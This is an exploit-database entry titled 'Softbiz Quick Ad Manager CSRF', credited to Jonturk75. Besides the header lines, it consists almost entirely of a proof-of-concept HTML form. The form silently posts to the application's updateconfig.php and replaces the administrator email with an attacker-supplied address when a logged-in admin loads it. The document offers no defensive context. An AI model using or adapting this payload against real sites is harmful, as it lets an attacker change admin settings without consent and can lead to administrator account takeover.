# Exploit Title: Softbiz Quick Ad Manager CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/softbiz-quick-ad-manager/32339/ # Category:: webapps # Demo : http://www.softbizscripts.com/scripts/ba/admin/ # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form action="updateconfig.php" method="post" name="frm1" id="frm1" onSubmit="return Validator(this);" > <input type="hidden" size="35" value="yourmail@mail.com" id="adminemail3" class="box1" name="adminemail"/> <input type="submit" value="Update Site Configuration" class="submit" name="Submit2"/> </form>